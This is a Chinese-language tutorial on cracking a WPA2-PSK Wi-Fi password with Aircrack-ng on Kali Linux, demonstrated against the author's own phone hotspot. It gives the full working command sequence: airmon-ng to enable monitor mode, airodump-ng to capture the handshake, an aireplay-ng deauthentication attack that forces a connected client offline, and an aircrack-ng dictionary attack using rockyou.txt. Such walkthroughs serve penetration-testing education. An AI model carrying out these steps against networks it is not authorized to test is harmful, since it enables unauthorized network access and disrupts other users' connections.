• 前情提要:
    • Kali LinuxKali 2023.3
    • VMware WorkstationVMware Workstation 17 Pro
    • 一个支持监听并且免驱动的无线网卡(本篇文章使用:BL-LW05-5R2),如果不是免驱的市面上大部分无线网卡都没有 Linux 系统的驱动。
    • VMware Workstation 编辑 -> 首选项 -> USB -> 询问要执行的操作/将设备连接到前台虚拟机
    • VMware Workstation 编辑虚拟机设置 -> 硬件设置上添加USB控制器 -> USB兼容性 -> USB 3.1(淦,就是这里,卡了我好久)

工具介绍

  • Aircrack-ng 是一个广泛使用的开源无线网络安全工具套件,旨在评估和测试无线网络的安全性。

aircrack-ng-new-logo

  • 它提供了一系列功能强大的工具,用于破解 WEPWPA/WPA2-PSK 等无线网络的密码,以及进行网络流量分析和攻击。
  • 以下是 Aircrack-ng 工具套件的主要组成部分和功能:
    • Airodump-ng:这是 Aircrack-ng 套件中的一个重要工具,用于捕获和分析无线网络的数据包。它可以显示周围的无线网络,包括其 BSSID(基本服务集标识符)、ESSID(扩展服务集标识符)、加密类型等信息。Airodump-ng 还能够捕获数据包并保存到文件中,以供后续分析和破解密码使用。
    • Aircrack-ng:这是 Aircrack-ng 工具套件的核心工具,用于破解无线网络的密码。它可以通过对捕获的数据包进行分析和破解,尝试恢复 WEP 密钥或 WPA/WPA2-PSK 的预共享密钥。Aircrack-ng 利用字典攻击和暴力破解等技术,对密码进行穷举破解,从而获取无线网络的访问权限。
    • Airmon-ng:这个工具用于在无线网卡上启用监视模式(monitor mode),以便进行数据包捕获和网络流量分析。监视模式允许用户查看经过无线网络的所有数据包,包括传输的敏感信息。Airmon-ng 还提供了其他有用的功能,如查看和控制无线接口的状态、停止运行中的进程等。
    • Aireplay-ng:这个工具用于生成和注入特定类型的数据包,以进行网络攻击和欺骗。它可以通过发送伪造的身份验证请求、重新关联无线客户端或进行数据包注入等方式,干扰和破坏无线网络的正常运行。Aireplay-ng 在破解无线网络密码时起到辅助的作用,增加密码破解的成功率。
    • Airbase-ng:这是一个虚拟无线接入点(AP)工具,用于创建伪造的无线网络。它可以模拟一个无线接入点,吸引无线客户端连接并传输数据。Airbase-ng 在安全评估和渗透测试中非常有用,用于测试无线客户端的安全性和行为。

注:Kali Linux 上已内置 Aircrack-ng。

工具使用

连接网卡

  • 插入无线网卡到物理机上,在 VMware Workstation 虚拟机 -> 可移动设备 -> 点击网卡并连接:

image-20231207000455524

  • Kali 中查看网卡配置,出现一张 wlan0 的网卡信息:

image-20231207000531852

开启监听

  • 开启前避免其他进程冲突,杀死有关进程:
1
2
root at kali in ~/Desktop 
$ airmon-ng check kill
  • 查看当前网卡是否支持监听:
1
2
root at kali in ~/Desktop 
$ airmon-ng

image-20231207000638124

  • 开启无线网卡的监听模式:
1
2
root at kali in ~/Desktop 
$ airmon-ng start wlan0
  • 查看是否开启成功:
1
2
root at kali in ~/Desktop 
$ iwconfig

image-20231207000728267

注:

  • 若大家根据网上的教程来做,这里网卡名称会变成 wlan0mon
  • 但这里还是 wlan0,使用 iwconfig 还是可以看见模式变成了 Monitor,所以没什么关系。

抓取握手包

  • 搜索一下附近的 WIFI

注:这里使用手机热点演示。

1
2
root at kali in ~/Desktop 
$ airodump-ng wlan0

image-20231207002338301

  • 发现 WIFI: 11nxx的iPhone,将其内容记录下来。
1
2
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
1A:BB:B8:16:84:9E -35 1 0 0 6 130 WPA2 CCMP PSK 11nxx的iPhone
  • 监听抓取数据包,并保存到对应位置:

注:要复制的话需要 Ctrl+C 停止再复制,因为数据是实时刷新的。

1
2
3
4
airodump-ng -c 信道值 --bssid BSSID -w hach wlan0
-c 指定 WIFI 信道,就是上图的 CH 值
--bssid 指定 WIFI BSSID,也就是 MAC 地址
-w 指定抓包文件的存放路径
1
2
3
root at kali in ~/Desktop 
$ airodump-ng -c 6 --bssid 1A:BB:B8:16:84:9E -w 11nxx wlan0
00:18:39 Created capture file "11nxx-01.cap".

image-20231207002437071

  • 此时发现该 WIFI 下有一个用户在连接,但这样是抓不到无线协议的握手包。因为已经连上了该 WIFI,所以是没有握手包产生。
1
2
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes               
1A:BB:B8:16:84:9E 92:D3:A3:E3:CC:97 -18 1e-24 0 685 EAPOL

强制下线

  • 既然没有握手包产生,那就把现有用户踢下线,让它重连进而出现握手包:

注:原先抓取握手包的监听不要关闭,新开一个终端。

1
2
3
4
aireplay-ng -0 2 -a BSSID -c STATION wlan0
-0 对客户端表示发起攻击的次数,默认为1
-a 指定 WIFI BSSID,也就是 MAC 地址
-c 指定用户的 MAC 地址,也就是上图的 STATION
1
2
root at kali in ~ 
$ aireplay-ng -0 2 -a 1A:BB:B8:16:84:9E -c 92:D3:A3:E3:CC:97 wlan0

image-20231207002639596

  • 经过攻击后,对方下线重连抓到了握手包,也就是这里出现 WPA handshake 即可。

暴力破解

  • 查看文件的存放的目录:

image-20231207002812130

  • 发现 11nxx-01.cap 文件,可以使用 Wireshark 打开,发现是无线协议数据包:

image-20231207002924911

  • 使用 aircrack-ng 进行暴力破解:
1
2
3
4
aircrack-ng -a2 -b BSSID -w wordlist xxx.cap
-a2 指定攻击模式(1:WEP,2:WPA-PSK)
-b 指定 WIFI BSSID,也就是 MAC 地址
-w 指定爆破字典文件
1
2
root at kali in ~/Desktop 
$ aircrack-ng -a2 -b 1A:BB:B8:16:84:9E -w /usr/share/wordlists/rockyou.txt 11nxx-01.cap

image-20231207003155097

  • 密码爆破成功~

关闭监听

  • 在监听模式下,Kali Linux 是无法连接网络的:

image-20231207003318244

  • 关闭无线网卡监听:
1
2
root at kali in ~/Desktop 
$ airmon-ng stop wlan0
  • 开启 NetworkManager 服务:
1
2
root at kali in ~ 
$ systemctl status NetworkManager
  • 如果还是没网络,重启一下 Kali Linux 即可。